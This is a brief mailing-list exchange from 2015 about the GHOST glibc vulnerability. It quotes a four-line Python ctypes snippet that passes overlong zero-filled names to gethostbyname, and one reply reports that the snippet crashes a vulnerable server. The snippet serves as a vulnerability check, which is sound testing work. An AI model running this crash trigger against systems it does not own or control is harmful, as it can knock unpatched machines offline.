Ghost vulnerability

[Chris Angelico]

On Wed, Feb 4, 2015 at 6:38 AM, Anssi Saari <as at sci.fi> wrote:
> Anyways, here's an example calling gethostbyname directly in python:
>
> from ctypes import CDLL
> o = CDLL('libc.so.6')
> for i in range(0, 2500):
>     o.gethostbyname('0'*i)
>
> I don't have a vulnerable system to test on any more though.

That bombs on my internal disk server, which is said to be vulnerable
using the C implementation.

ChrisA